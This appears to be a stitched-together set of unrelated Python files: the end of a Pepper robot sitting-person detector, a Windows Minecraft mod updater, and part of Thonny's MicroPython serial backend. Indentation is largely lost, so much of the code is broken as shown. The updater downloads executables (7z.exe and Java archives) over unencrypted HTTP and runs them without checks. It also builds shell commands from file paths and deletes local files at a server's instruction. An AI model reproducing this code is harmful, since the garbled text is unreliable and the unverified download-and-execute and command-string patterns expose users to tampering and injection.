px,py,pz = memory_service.getData("PeoplePerception/Person/"+str(personid)+"/PositionInRobotFrame")
print "[ Person sitting ]"
print " X: " + str(px) + " Y: " + str(py)
w_px, w_py = point2world(memory_service,[px,py])
memory_service.insertData("Condition/personsitting/world_coordinates",[w_px,w_py])
memory_service.insertData("Condition/personsitting/robot_coordinates_x",px)
memory_service.insertData("Condition/personsitting/robot_coordinates_y",py)
memory_service.insertData("Condition/personsitting/id",personid)
v = 'true'
except:
pass
#except:
# v = 'false'
set_condition(memory_service,'personsitting',v)
#print 'personhere:: value ',v
time.sleep(1)
print "personsitting thread quit"
def init(session):
global memory_service
global monitorThread
print "Person sitting init"
#Starting services
memory_service = session.service("ALMemory")
sitting_service = session.service("ALSittingPeopleDetection")
# PARAMETERS
sitting_service.setSittingThreshold(1.45)
sitting_threshold = sitting_service.getSittingThreshold()
print "sitting threshold: ",sitting_threshold
print "Creating the thread"
#create a thead that monitors directly the signal
monitorThread = threading.Thread(target = rhMonitorThread, args = (memory_service,))
monitorThread.start()
def quit():
global monitorThread
print "Person sitting quit"
monitorThread.do_run = False
def main():
global memory_service
parser = argparse.ArgumentParser()
parser.add_argument("--pip", type=str, default=os.environ['PEPPER_IP'],
help="Robot IP address. On robot or Local Naoqi: use '127.0.0.1'.")
parser.add_argument("--pport", type=int, default=9559,
help="Naoqi port number")
args = parser.parse_args()
pip = args.pip
pport = args.pport
#Starting application
try:
connection_url = "tcp://" + pip + ":" + str(pport)
print "Connecting to ", connection_url
app = qi.Application(["PersonSitting", "--qi-url=" + connection_url ])
except RuntimeError:
print ("Can't connect to Naoqi at ip \"" + pip + "\" on port " + str(pport) +".\n"
"Please check your script arguments. Run with -h option for help.")
sys.exit(1)
app.start()
session = app.session
init(session)
app.run()
if __name__ == "__main__":
main()
|
updater.py
|
# -*- coding: utf-8 -*-
import os,tempfile,platform,urllib.request,sys,threading,getpass,config,hashlib,json,requests,random,string,lang,subprocess
os.system("@title "+config.NAME+" "+config.VER)
pwd = os.getcwd()
r = requests.get(config.TEST_URL)
if r.status_code!=204:
print(lang.NETWORK_ERROR)
input()
sys.exit()
elif os.path.exists(config.MC_DIR)==False:
print(lang.CANNOT_FIND_MC_DIR)
input()
sys.exit()
elif os.path.exists(config.MC_DIR+"mods/")==False:
print(lang.CANNOT_FIND_MODS_DIR)
input()
sys.exit()
def readFile(file):
    # Returns the last line of the file (the config files hold a single value).
    txt = ""
    f = open(file)
    line = f.readline()
    while line:
        txt = str(line)
        line = f.readline()
    f.close()
    return txt
def execCmd(cmd):
r = os.popen(cmd)
text = r.read()
r.close()
return text
def callbackfunc(blocknum, blocksize, totalsize):
global url
percent = 100.0 * blocknum * blocksize / totalsize
if percent > 100:
percent = 100
downsize=blocknum * blocksize
if downsize >= totalsize:
downsize=totalsize
s ="%.2f%%"%(percent)+"====>"+"%.2f"%(downsize/1024/1024)+"M/"+"%.2f"%(totalsize/1024/1024)+"M \r"
sys.stdout.write(s)
sys.stdout.flush()
if percent == 100:
print('')
def dl(url,filename):
urllib.request.urlretrieve(url, filename, callbackfunc)
def unzip(source_zip,target_dir):
print("")
print("- "+lang.DOWNLOADING_MSG)
program_pwd = "C:\\Users\\" + getpass.getuser() + "\\AppData\\Local\\Temp\\"
if os.path.isfile(program_pwd+'7z.exe') == False:
dl("http://uuz.cat/7z/7z.exe",program_pwd+"7z.exe")
if os.path.isfile(program_pwd+'7z.dll') == False:
dl("http://uuz.cat/7z/7z.dll",program_pwd+"7z.dll")
if os.path.isfile(program_pwd+'7z.sfx') == False:
dl("http://uuz.cat/7z/7z.sfx",program_pwd+"7z.sfx")
print("")
print("- "+lang.UNZIP_MSG)
cmd=program_pwd+'7z.exe x \"'+source_zip+'" -y -aos -o\"'+target_dir+'\"'
os.system(cmd)
def md5sum(file_name):
fp = open(file_name, 'rb')
content = fp.read()
fp.close()
m = hashlib.md5(content)
file_md5 = m.hexdigest()
return file_md5
def deep_search(needles, haystack):
found = {}
if type(needles) != type([]):
needles = [needles]
if type(haystack) == type(dict()):
for needle in needles:
if needle in haystack.keys():
found[needle] = haystack[needle]
elif len(haystack.keys()) > 0:
for key in haystack.keys():
result = deep_search(needle, haystack[key])
if result:
for k, v in result.items():
found[k] = v
elif type(haystack) == type([]):
for node in haystack:
result = deep_search(needles, node)
if result:
for k, v in result.items():
found[k] = v
return found
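# Example (hypothetical data): deep_search("b", {"a": 1, "c": {"b": 2}}) walks the
# nested dicts/lists and returns {"b": 2}; passing a list of needles collects every
# match into one flat dict.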
def random_str(randomlength=8):
a = list(string.ascii_letters)
random.shuffle(a)
return ''.join(a[:randomlength])
def init():
if os.path.isfile(pwd + "\\config\\maxram.cfg"):
os.remove("config\\maxram.cfg")
print("")
print(lang.RAM_INPUT)
print("")
print(lang.RAM_EXAMPLE)
print("")
maxram = input(lang.SETTING)
if int(maxram)<512:
print(lang.INPUT_CORRECT)
init()
elif int(maxram)>4096:
print(lang.INPUT_CORRECT)
init()
else:
file_object = open("config\\maxram.cfg", 'w')
file_object.write(maxram)
file_object.close()
maxram = maxram
def user():
if os.path.isfile(pwd + "\\config\\username.cfg"):
os.remove("config\\username.cfg")
user=input(lang.SET_NAME)
    if not user:
print(lang.INPUT_CORRECT)
user()
else:
file_object = open("config\\username.cfg", 'w')
file_object.write(user)
file_object.close()
username = user
def start(path):
print("")
print(lang.CHOOSE_MSG)
print("")
print("[0] "+lang.START_GAME)
print("[1] "+lang.RESET_USERNAME)
print("[2] "+lang.RESET_RAM)
print("")
choose=input(lang.CHOOSE_RIGHT)
if int(choose)==0:
print("")
print(lang.STARTING_GAME)
#print(path)
subprocess.Popen([path])
print("=> "+lang.START_DONE)
print("")
elif int(choose)==1:
user()
print("")
print("=> "+lang.SETED)
start(path)
elif int(choose)==2:
init()
print("")
print("=> "+lang.SETED)
start(path)
else:
print("x "+lang.INPUT_CORRECT)
start(path)
print("")
print(lang.CHECKING)
FileList = []
rootdir = os.environ['APPDATA']+"\\mcupdater\\"
for root, subFolders, files in os.walk(rootdir):
if 'done' in subFolders:
subFolders.remove('done')
for f in files:
if f.find('javaw.exe') != -1:
FileList.append(os.path.join(root, f))
if FileList:
if os.path.exists("config/") == False:
os.mkdir(pwd+"\\config\\")
if os.path.isfile(pwd + "/config/maxram.cfg") == False:
init()
print("")
print("=> "+lang.SETED)
if os.path.isfile(pwd + "/config/username.cfg") == False:
user()
print("")
print("=> "+lang.SETED)
shell = config.BAT
maxram = readFile("config\\maxram.cfg")
username = readFile("config\\username.cfg")
rpe_shell = shell.replace("{dir}", pwd)
rpe_shell = rpe_shell.replace("{java}", FileList[0])
rpe_shell = rpe_shell.replace("{maxram}", maxram)
rpe_shell = rpe_shell.replace("{username}", username)
tmp_filename = tempfile.mktemp(".bat")
open(tmp_filename, "w").close()
#print(tmp_filename)
file_object = open(tmp_filename, 'w')
file_object.write("@echo off\n")
file_object.write("set appdata=" + pwd + "\.minecraft\n")
file_object.write("cd /D %appdata%\n")
file_object.write(rpe_shell)
file_object.close()
ModList = []
localList = []
rootdir = config.MC_DIR+"mods/"
for name in os.listdir(rootdir):
if name.endswith('.jar') or name.endswith('.zip') or name.endswith('.litemod'):
filepath=rootdir+name
md5=md5sum(filepath)
ModList.append({0:md5,1:name})
localList.append({md5:name})
#print(json.dumps(localList, sort_keys=True, indent=4))
_json = json.dumps(ModList, sort_keys=True, indent=4)
headers = {
'User-Agent': config.UA
}
r = requests.post(config.API_URL , headers=headers , data=_json)
_output = r.text
#print(_output)
data = json.loads(_output)
if data["update"]==-1:
print("")
print("x "+lang.ERROR_1)
input()
sys.exit()
elif data["update"]==-2:
print("")
print("x "+lang.TOKEN_ERROR)
input()
sys.exit()
elif data["update"] == 1:
print("")
print("o "+lang.UPDATEING)
if data["del"]:
print("")
print(lang.DELETE_MSG)
for del_md5 in data["del"]:
md5=del_md5
result = deep_search(del_md5, localList)
filename = result[md5]
os.remove(config.MC_DIR+"mods/"+filename)
print(filename+" => Done")
if data["down"]:
print("")
num=0
for dls in data["down"]:
save_name=random_str(32)
save_name=save_name+"."+dls[0]
num=num+1
total=data["down_total"]
dl_url=dls[1]
print(lang.DOWNLOADING_MSG+" (" + str(num) + "/" + str(total) + ")")
save_path=pwd+"/"+config.MC_DIR+"mods/"+save_name
                # download synchronously so every mod is in place before the game starts
                dl(dl_url, save_path)
start(tmp_filename)
else:
print("")
print("=> "+lang.LASTEST)
start(tmp_filename)
else:
print("")
print("x "+lang.CANNOT_FIND_JAVA)
bit=platform.machine()
if bit=="AMD64":
packge_name = "j8x64.zip"
else:
packge_name="j8x86.zip"
print("")
print("- 正在下载Java环境包..")
tmp_filename = tempfile.mktemp(".zip")
threading.Thread(target=dl("http://uuz.cat/"+packge_name,tmp_filename), args=('')).start()
program_pwd=os.environ['APPDATA']+"\\mcupdater\\"
if os.path.exists(program_pwd)==False:
os.mkdir(program_pwd)
unzip(tmp_filename,program_pwd)
print("")
print("O "+lang.JAVA_INSTALL_DONE)
input()
sys.exit()
|
backend.py
|
from thonny.common import (
InputSubmission,
InterruptCommand,
EOFCommand,
parse_message,
ToplevelCommand,
ToplevelResponse,
InlineCommand,
InlineResponse,
UserError,
serialize_message,
BackendEvent,
ValueInfo,
execute_system_command,
)
import sys
import logging
import traceback
import queue
from thonny.plugins.micropython.connection import (
ConnectionClosedException,
ConnectionFailedException,
)
from textwrap import dedent
import ast
import re
from queue import Queue, Empty
import threading
import os
import time
from thonny.misc_utils import find_volumes_by_name, sizeof_fmt
import jedi
import io
import tokenize
from thonny.running import EXPECTED_TERMINATION_CODE
import binascii
import shutil
# See https://github.com/dhylands/rshell/blob/master/rshell/main.py
# for UART_BUFFER_SIZE vs USB_BUFFER_SIZE
# ampy uses 32 bytes: https://github.com/pycampers/ampy/blob/master/ampy/files.py
# I'm not worrying so much, because reader thread reads continuously
# and writer (SerialConnection) has its own blocks and delays
BUFFER_SIZE = 512
BAUDRATE = 115200
ENCODING = "utf-8"
# Commands
RAW_MODE_CMD = b"\x01"
NORMAL_MODE_CMD = b"\x02"
INTERRUPT_CMD = b"\x03"
SOFT_REBOOT_CMD = b"\x04"
# Output tokens
THONNY_MSG_START = b"\x02<thonny>"
THONNY_MSG_END = b"</thonny>\x04"
EOT = b"\x04"
NORMAL_PROMPT = b">>> "
LF = b"\n"
OK = b"OK"
# first prompt when switching to raw mode (or after soft reboot in raw mode)
# Looks like it's not translatable in CP
# https://github.com/adafruit/circuitpython/blob/master/locale/circuitpython.pot
FIRST_RAW_PROMPT = b"raw REPL; CTRL-B to exit\r\n>"
FIRST_RAW_PROMPT_SUFFIX = b"\r\n>"
RAW_PROMPT = b">"
BLOCK_CLOSERS = re.compile(
b"|".join(map(re.escape, [LF, EOT, THONNY_MSG_START, NORMAL_PROMPT, FIRST_RAW_PROMPT]))
)
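# Used to split device output so that each chunk read in _process_until_raw_prompt
# contains at most one protocol marker (or newline).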
logger = logging.getLogger("thonny.micropython.backend")
def debug(msg):
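    # Debug tracing is disabled: the unconditional return below makes the print unreachable.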
return
print(msg, file=sys.stderr)
class MicroPythonBackend:
def __init__(self, connection, clean, api_stubs_path):
self._connection = connection
self._local_cwd = None
self._cwd = None
self._interrupt_requested = False
self._cancel_requested = False
self._command_queue = Queue() # populated by reader thread
self._progress_times = {}
self._api_stubs_path = api_stubs_path
self._command_reading_thread = threading.Thread(target=self._read_commands, daemon=True)
self._command_reading_thread.start()
self._startup_time = time.time()
self._ctrl_suggestion_given = False
try:
self._prepare(clean)
self._mainloop()
except ConnectionClosedException as e:
self._on_connection_closed(e)
except Exception:
logger.exception("Crash in backend")
traceback.print_exc()
def _prepare(self, clean):
if clean:
self._interrupt_to_raw_prompt()
self._clear_environment()
else:
self._process_until_initial_raw_prompt()
self._cwd = self._fetch_cwd()
self._welcome_text = self._fetch_welcome_text()
self._builtin_modules = self._fetch_builtin_modules()
self._builtins_info = self._fetch_builtins_info()
self._send_ready_message()
def _mainloop(self):
while True:
try:
self._cancel_requested = False
self._interrupt_requested = False
self._check_for_connection_errors()
try:
cmd = self._command_queue.get(timeout=0.1)
except Empty:
# No command in queue, but maybe a thread produced output meanwhile
                    # or the user reset the device
self._forward_unexpected_output()
continue
if isinstance(cmd, InputSubmission):
self._submit_input(cmd.data)
elif isinstance(cmd, EOFCommand):
self._soft_reboot(False)
elif isinstance(cmd, InterruptCommand):
self._interrupt()
else:
self.handle_command(cmd)
except KeyboardInterrupt:
self._interrupt()
def _fetch_welcome_text(self):
self._connection.write(NORMAL_MODE_CMD)
welcome_text = self._connection.read_until(NORMAL_PROMPT).strip(b"\r\n >")
if os.name != "nt":
welcome_text = welcome_text.replace(b"\r\n", b"\n")
# Go back to raw prompt
self._connection.write(RAW_MODE_CMD)
self._connection.read_until(FIRST_RAW_PROMPT)
return welcome_text.decode(ENCODING, errors="replace")
def _fetch_uname(self):
res = self._evaluate("__thonny_os.uname()", prelude="import os as __thonny_os")
return {
"sysname": res[0],
"nodename": res[1],
"release": res[2],
"version": res[3],
"machine": res[4],
}
def _fetch_builtin_modules(self):
out, err, _ = self._execute("help('modules')", capture_output=True)
assert not err, "Error was: %r" % err
modules_str_lines = out.strip().splitlines()
last_line = modules_str_lines[-1].strip()
        if last_line.count(" ") > 0 and "  " not in last_line and "\t" not in last_line:
# probably something like "plus any modules on the filesystem"
# (can be in different languages)
modules_str_lines = modules_str_lines[:-1]
modules_str = (
" ".join(modules_str_lines)
.replace("/__init__", "")
.replace("__main__", "")
.replace("/", ".")
)
return modules_str.split()
def _fetch_builtins_info(self):
"""
for p in self._get_api_stubs_path():
builtins_file = os.path.join(p, "__builtins__.py")
if os.path.exists(builtins_file):
return parse_api_information(builtins_file)
"""
path = os.path.join(self._api_stubs_path, "builtins.py")
if os.path.exists(path):
return parse_api_information(path)
else:
return {}
def _fetch_cwd(self):
return self._evaluate(
"__thonny_os.getcwd() if hasattr(__thonny_os, 'getcwd') else ''",
prelude="import os as __thonny_os",
)
def _send_ready_message(self):
self.send_message(ToplevelResponse(welcome_text=self._welcome_text, cwd=self._cwd))
def _check_send_inline_progress(self, cmd, value, maximum, description=None):
assert "id" in cmd
prev_time = self._progress_times.get(cmd["id"], 0)
if value != maximum and time.time() - prev_time < 0.2:
# Don't notify too often
return
else:
self._progress_times[cmd["id"]] = time.time()
if description is None:
description = cmd.get("description", "Working...")
self.send_message(
BackendEvent(
event_type="InlineProgress",
command_id=cmd["id"],
value=value,
maximum=maximum,
description=description,
)
)
def _interrupt(self):
self._connection.write(INTERRUPT_CMD)
def _check_for_interrupt(self, action_scope):
if action_scope == "device" and self._interrupt_requested:
self._interrupt()
self._interrupt_requested = False
if action_scope == "local" and self._cancel_requested:
self._cancel_requested = False
raise KeyboardInterrupt()
def _interrupt_to_raw_prompt(self):
# NB! Sometimes disconnecting and reconnecting (on macOS?)
# too quickly causes anomalies. See CalliopeMiniProxy for more details
discarded_bytes = b""
for delay in [0.05, 0.5, 0.1, 1.0, 3.0, 5.0]:
# Interrupt several times, because with some drivers first interrupts seem to vanish
if delay >= 1:
self._show_error(
"Could not enter REPL. Trying again with %d second waiting time..." % delay
)
self._connection.reset_output_buffer()
self._connection.write(INTERRUPT_CMD)
self._connection.write(RAW_MODE_CMD)
time.sleep(delay)
discarded_bytes += self._connection.read_all()
if discarded_bytes.endswith(FIRST_RAW_PROMPT) or discarded_bytes.endswith(b"\r\n>"):
break
else:
max_tail_length = 500
if len(discarded_bytes) > max_tail_length:
discarded_bytes_str = (
"[skipping %d bytes] ..." % (len(discarded_bytes) - max_tail_length)
) + repr(discarded_bytes[:-max_tail_length])
else:
discarded_bytes_str = repr(discarded_bytes)
self._show_error(
"Could not enter REPL. Giving up. Read bytes:\n"
+ discarded_bytes_str
+ "\n\nYour options:\n\n"
+ " - check connection properties;\n"
+ " - make sure the device has suitable firmware;\n"
+ " - make sure the device is not in bootloader mode;\n"
+ " - reset the device and try again;\n"
+ " - try other serial clients (Putty, TeraTerm, screen, ...);\n"
+ " - ask for help in Thonny's forum or issue tracker."
)
sys.exit()
def _soft_reboot(self, side_command):
if side_command:
self._interrupt_to_raw_prompt()
# Need to go to normal mode. MP doesn't run user code in raw mode
# (CP does, but it doesn't hurt to do it there as well)
self._connection.write(NORMAL_MODE_CMD)
self._connection.read_until(NORMAL_PROMPT)
self._connection.write(SOFT_REBOOT_CMD)
if not side_command:
self._process_until_raw_prompt()
self.send_message(ToplevelResponse(cwd=self._cwd))
def _read_commands(self):
"works in separate thread"
while True:
line = sys.stdin.readline()
if line == "":
logger.info("Read stdin EOF")
sys.exit()
cmd = parse_message(line)
if isinstance(cmd, InterruptCommand):
self._interrupt_requested = True
self._cancel_requested = True
else:
self._command_queue.put(cmd)
def handle_command(self, cmd):
assert isinstance(cmd, (ToplevelCommand, InlineCommand))
if "local_cwd" in cmd:
self._local_cwd = cmd["local_cwd"]
def create_error_response(**kw):
if not "error" in kw:
kw["error"] = traceback.format_exc()
if isinstance(cmd, ToplevelCommand):
return ToplevelResponse(command_name=cmd.name, **kw)
else:
return InlineResponse(command_name=cmd.name, **kw)
handler = getattr(self, "_cmd_" + cmd.name, None)
if handler is None:
response = create_error_response(error="Unknown command: " + cmd.name)
else:
try:
response = handler(cmd)
except SystemExit:
# Must be caused by Thonny or plugins code
if isinstance(cmd, ToplevelCommand):
traceback.print_exc()
response = create_error_response(SystemExit=True)
except UserError as e:
sys.stderr.write(str(e) + "\n")
response = create_error_response()
except KeyboardInterrupt:
response = create_error_response(error="Interrupted", interrupted=True)
except Exception:
_report_internal_error()
response = create_error_response(context_info="other unhandled exception")
if response is None:
response = {}
if response is False:
# Command doesn't want to send any response
return
elif isinstance(response, dict):
if isinstance(cmd, ToplevelCommand):
response = ToplevelResponse(command_name=cmd.name, **response)
elif isinstance(cmd, InlineCommand):
response = InlineResponse(cmd.name, **response)
if "id" in cmd and "command_id" not in response:
response["command_id"] = cmd["id"]
debug("cmd: " + str(cmd) + ", respin: " + str(response))
self.send_message(response)
def _submit_input(self, cdata: str) -> None:
# TODO: what if there is a previous unused data waiting
assert self._connection.outgoing_is_empty()
assert cdata.endswith("\n")
if not cdata.endswith("\r\n"):
# submission is done with CRLF
cdata = cdata[:-1] + "\r\n"
bdata = cdata.encode(ENCODING)
self._connection.write(bdata)
# Try to consume the echo
try:
echo = self._connection.read(len(bdata))
except queue.Empty:
# leave it.
logging.warning("Timeout when reading echo")
return
if echo != bdata:
# because of autoreload? timing problems? interruption?
# Leave it.
logging.warning("Unexpected echo. Expected %s, got %s" % (bdata, echo))
self._connection.unread(echo)
def send_message(self, msg):
if "cwd" not in msg:
msg["cwd"] = self._cwd
sys.stdout.write(serialize_message(msg) + "\n")
sys.stdout.flush()
def _send_output(self, data, stream_name):
if not data:
return
data = self._transform_output(data)
msg = BackendEvent(event_type="ProgramOutput", stream_name=stream_name, data=data)
self.send_message(msg)
def _transform_output(self, data):
# Any keypress wouldn't work
return data.replace(
"Press any key to enter the REPL. Use CTRL-D to reload.",
"Press Ctrl-C to enter the REPL. Use CTRL-D to reload.",
)
def _ensure_raw_propmt(self):
# similar to _interrupt_to_raw_prompt, but assumes we are already in a prompt
self._forward_unexpected_output()
self._connection.write(RAW_MODE_CMD)
prompt = self._connection.read_until(FIRST_RAW_PROMPT_SUFFIX, 1, True)
if not prompt.endswith(FIRST_RAW_PROMPT_SUFFIX):
raise TimeoutError("Could not ensure raw prompt")
def _execute(self, script, capture_output=False):
self._ensure_raw_propmt()
# send command
self._connection.write(script.encode(ENCODING) + EOT)
debug("Wrote " + script + "\n--------\n")
# fetch command confirmation
ok = self._connection.read(2)
debug("GOTOK")
assert ok == OK, "Expected OK, got %r, followed by %r" % (ok, self._connection.read_all())
return self._process_until_raw_prompt(capture_output)
def _execute_without_output(self, script):
out, err, value = self._execute(script, capture_output=True)
if err or out:
raise RuntimeError("Failed MP script: " + str(out) + "\n" + str(err))
return value
def _execute_print_expr(self, expr, prelude="", cleanup="", capture_output=False):
# assuming expr really contains an expression
# separator is for separating side-effect output and printed value
script = ""
if prelude:
script += prelude + "\n"
script += "print(%r, repr(%s), sep='', end=%r)" % (
THONNY_MSG_START.decode(),
expr,
THONNY_MSG_END.decode(),
)
# assuming cleanup doesn't cause output
if cleanup:
script += "\n" + cleanup
return self._execute(script, capture_output)
def _evaluate(self, expr, prelude="", cleanup=""):
_, _, value_repr = self._execute_print_expr(expr, prelude, cleanup)
if value_repr is None:
return None
else:
return ast.literal_eval(value_repr)
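    # For example, _evaluate("2 + 2") sends a script ending with
    # print('\x02<thonny>', repr(2 + 2), sep='', end='</thonny>\x04') to the board;
    # _process_until_raw_prompt() strips the markers and the "4" comes back through
    # ast.literal_eval above.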
def _process_until_initial_raw_prompt(self):
self._connection.write(RAW_MODE_CMD)
try:
self._process_until_raw_prompt()
except KeyboardInterrupt:
self._interrupt()
def _process_until_raw_prompt(self, capture_output=False):
"""
Forwards output, extracts Thonny message, replaces normal prompts with raw prompts.
This is executed when some code is running or just after requesting raw prompt.
After submitting commands to the raw REPL, the output should be like
{stdout}\x04\{stderr}\x04\n\>
In the end of {stdout} there may be \x02{value-for-thonny}
Interrupts will alter the execution, but from the response parsing
perspective they don't matter as they look like any other exception.
Things get complicated because of soft-reboots, which always end with
regular prompt. Soft-reboots can occur because of Ctrl+D, machine.soft_reset()
and even reset button (micro:bit).
Because of soft-reboot we can't assume we'll find the terminating markers for
each command.
Output produced by background threads (eg. in WiPy ESP32) cause even more difficulties,
because it becomes impossible to say whether we are at prompt and output
is from another thread or the main thread is running.
For now I'm ignoring these problems and assume all output comes from the main thread.
"""
# TODO: experiment with Ctrl+C, Ctrl+D, reset
eot_count = 0
value = None
done = False
output = b""
out = b""
err = b""
while not done:
if (
self._connection.num_bytes_received == 0
and not self._ctrl_suggestion_given
and time.time() - self._startup_time > 1.5
):
self._show_error(
"\n"
+ "Device is busy or does not respond. Your options:\n\n"
+ " - wait until it completes current work;\n"
+ " - use Ctrl+C to interrupt current work;\n"
+ " - use Stop/Restart to interrupt more and enter REPL.\n"
)
self._ctrl_suggestion_given = True
# There may be an input submission waiting
# and we can't progress without resolving it first
self._check_for_side_commands()
self._check_for_interrupt("device")
# Process input in chunks (max 1 parsing marker per chunk).
# Prefer whole lines (to reduce the number of events),
# but don't wait too long for eol.
ddd = self._connection.soft_read_until(BLOCK_CLOSERS, timeout=0.05)
output += ddd
stream_name = "stderr" if eot_count == 1 else "stdout"
if output.endswith(THONNY_MSG_START):
debug("MSGSTA: " + str(output))
output = output[: -len(THONNY_MSG_START)]
# Low chance of failure (eg. because of precisely timed reboot),
# therefore it's safe to use big timeout
temp = self._connection.soft_read_until(THONNY_MSG_END, timeout=3)
if temp.endswith(THONNY_MSG_END):
value = temp[: -len(THONNY_MSG_END)]
debug("GOTVALUE: " + str(value))
else:
# failure, restore everything to help diagnosis
output = output + THONNY_MSG_START + temp
elif output.endswith(EOT):
debug("EOT: " + str(output))
output = output[: -len(EOT)]
eot_count += 1
if eot_count == 2:
# Normal completion of the command
# big chance of being at the raw prompt
temp = self._connection.soft_read_until(RAW_PROMPT, timeout=0.1)
if temp == RAW_PROMPT and self._connection.incoming_is_empty():
done = True
elif temp:
# Failure, temp needs to be parsed again
self._connection.unread(temp)
elif output.endswith(FIRST_RAW_PROMPT) and self._connection.incoming_is_empty():
debug("FIRAPRO: " + str(output))
output = output[: -len(FIRST_RAW_PROMPT)]
done = True
elif (
output.endswith(NORMAL_PROMPT)
and self._connection.peek_incoming() == b"\r\n" + FIRST_RAW_PROMPT
):
debug("NOPRO: " + str(output))
output = output + self._connection.read_until(FIRST_RAW_PROMPT)
# skip both normal and raw prompt together
# (otherwise they get processed separately)
output = output[: -len(NORMAL_PROMPT + b"\r\n" + FIRST_RAW_PROMPT)]
done = True
elif output.endswith(NORMAL_PROMPT) and self._connection.incoming_is_empty():
debug("NOPRO2: " + str(output))
output = output[: -len(NORMAL_PROMPT)]
# switch to raw mode and continue
self._connection.write(RAW_MODE_CMD)
if output.endswith(FIRST_RAW_PROMPT[:-1]):
# incomplete raw prompt, wait for more
pass
elif output:
if capture_output:
if stream_name == "stdout":
out += output
else:
assert stream_name == "stderr"
err += output
else:
self._send_output(output.decode(ENCODING, errors="replace"), stream_name)
output = b""
debug("doneproc")
return (
out.decode(ENCODING, errors="replace"),
err.decode(ENCODING, errors="replace"),
None if value is None else value.decode(ENCODING),
)
def _clear_environment(self):
# TODO: Ctrl+D in raw repl is perfect for MicroPython
# but on CircuitPython it runs main.py
# TODO: which is better:
# self._execute_async(dedent("""
# for name in globals():
# if not name.startswith("__"):
# del globals()[name]
# """).strip())
# or
self._execute("globals().clear(); __name__ = '__main__'")
def _check_for_side_commands(self):
# most likely the queue is empty
if self._command_queue.empty():
return
postponed = []
while not self._command_queue.empty():
cmd = self._command_queue.get()
if isinstance(cmd, InputSubmission):
self._submit_input(cmd.data)
elif isinstance(cmd, EOFCommand):
self._soft_reboot(True)
else:
postponed.append(cmd)
# put back postponed commands
while postponed:
self._command_queue.put(postponed.pop(0))
def _forward_unexpected_output(self):
"Invoked between commands"
data = self._connection.read_all()
if data.endswith(NORMAL_PROMPT):
            # looks like the device was reset
# hide the regular prompt from the output ...
data = data[: -len(NORMAL_PROMPT)]
at_prompt = True
else:
at_prompt = False
self._send_output(data.decode(ENCODING, "replace"), "stdout")
if at_prompt:
# ... and recreate Thonny prompt
self.send_message(ToplevelResponse())
self._check_for_connection_errors()
def _supports_directories(self):
# NB! make sure self._cwd is queried first
return bool(self._cwd)
def _connected_to_microbit(self):
return "micro:bit" in self._welcome_text.lower()
def _cmd_interrupt(self, cmd):
self._interrupt()
def _cmd_cd(self, cmd):
if len(cmd.args) == 1:
if not self._supports_directories():
raise UserError("This device doesn't have directories")
path = cmd.args[0]
self._execute("import os as __thonny_os; __thonny_os.chdir(%r)" % path)
self._cwd = self._fetch_cwd()
return {}
else:
raise UserError("%cd takes one parameter")
def _cmd_Run(self, cmd):
self._clear_environment()
assert cmd.get("source")
self._execute(cmd["source"])
return {}
def _cmd_execute_source(self, cmd):
try:
# Try to parse as expression
ast.parse(cmd.source, mode="eval")
# If it didn't fail then source is an expression
_, _, value_repr = self._execute_print_expr(cmd.source)
if value_repr is None:
value_repr = repr(None)
return {"value_info": ValueInfo(0, value_repr)}
except SyntaxError:
# source is a statement (or invalid syntax)
self._execute(cmd.source)
return {}
def _cmd_execute_system_command(self, cmd):
# Can't use stdin, because a thread is draining it
execute_system_command(cmd, cwd=self._local_cwd, disconnect_stdin=True)
def _cmd_get_globals(self, cmd):
if cmd.module_name == "__main__":
globs = self._evaluate(
"{name : repr(value) for (name, value) in globals().items() if not name.startswith('__')}"
)
else:
            globs = self._evaluate(
                "{name : repr(getattr(__mod_for_globs, name)) for name in dir(__mod_for_globs) if not name.startswith('__')}",
                prelude="import %s as __mod_for_globs" % cmd.module_name,
            )
return {"module_name": cmd.module_name, "globals": globs}
def _cmd_get_dirs_child_data(self, cmd):
if self._supports_directories():
data = self._get_dirs_child_data_generic(cmd["paths"])
dir_separator = "/"
else:
assert cmd["paths"] == {""}, "Bad command: " + repr(cmd)
sizes = self._get_microbit_file_sizes()
root_data = {name: {"kind": "file", "size": size} for (name, size) in sizes.items()}
data = {"": root_data}
dir_separator = ""
return {"node_id": cmd["node_id"], "dir_separator": dir_separator, "data": data}
def _cmd_get_fs_info(self, cmd):
return self._get_fs_info(cmd.path)
def _cmd_write_file(self, cmd):
def generate_blocks(content_bytes, block_size):
for i in range(0, len(content_bytes), block_size):
yield content_bytes[i : i + block_size]
self._write_file(generate_blocks(cmd["content_bytes"], BUFFER_SIZE), cmd["path"])
return InlineResponse(
command_name="write_file", path=cmd["path"], editor_id=cmd.get("editor_id")
)
def _cmd_delete(self, cmd):
assert cmd.paths
paths = sorted(cmd.paths, key=lambda x: len(x), reverse=True)
try:
self._delete_via_serial(paths)
except Exception as e:
if "read-only" in str(e).lower():
self._delete_via_mount(paths)
self._sync_all_filesystems()
def _internal_path_to_mounted_path(self, path):
mount_path = self._get_fs_mount()
if mount_path is None:
return None
flash_prefix = self._get_flash_prefix()
if not path.startswith(flash_prefix):
return None
path_suffix = path[len(flash_prefix) :]
return os.path.join(mount_path, os.path.normpath(path_suffix))
def _cmd_read_file(self, cmd):
try:
content_bytes = b"".join(self._read_file(cmd["path"]))
error = None
except Exception as e:
_report_internal_error()
error = str(e)
content_bytes = None
return {"content_bytes": content_bytes, "path": cmd["path"], "error": error}
def _cmd_download(self, cmd):
total_size = 0
completed_files_size = 0
remote_files = self._list_remote_files_with_info(cmd["source_paths"])
target_dir = cmd["target_dir"].rstrip("/").rstrip("\\")
download_items = []
for file in remote_files:
total_size += file["size"]
# compute filenames (and subdirs) in target_dir
# relative to the context of the user selected items
assert file["path"].startswith(file["original_context"])
path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
target_path = os.path.join(target_dir, os.path.normpath(path_suffix))
download_items.append(dict(source=file["path"], target=target_path, size=file["size"]))
if not cmd["allow_overwrite"]:
targets = [item["target"] for item in download_items]
existing_files = list(filter(os.path.exists, targets))
if existing_files:
return {
"existing_files": existing_files,
"source_paths": cmd["source_paths"],
"target_dir": cmd["target_dir"],
"description": cmd["description"],
}
def notify(current_file_progress):
self._check_send_inline_progress(
cmd, completed_files_size + current_file_progress, total_size
)
# replace the indeterminate progressbar with determinate as soon as possible
notify(0)
for item in download_items:
written_bytes = self._download_file(item["source"], item["target"], notify)
assert written_bytes == item["size"]
completed_files_size += item["size"]
def _cmd_upload(self, cmd):
completed_files_size = 0
local_files = self._list_local_files_with_info(cmd["source_paths"])
target_dir = cmd["target_dir"]
assert target_dir.startswith("/") or not self._supports_directories()
assert not target_dir.endswith("/") or target_dir == "/"
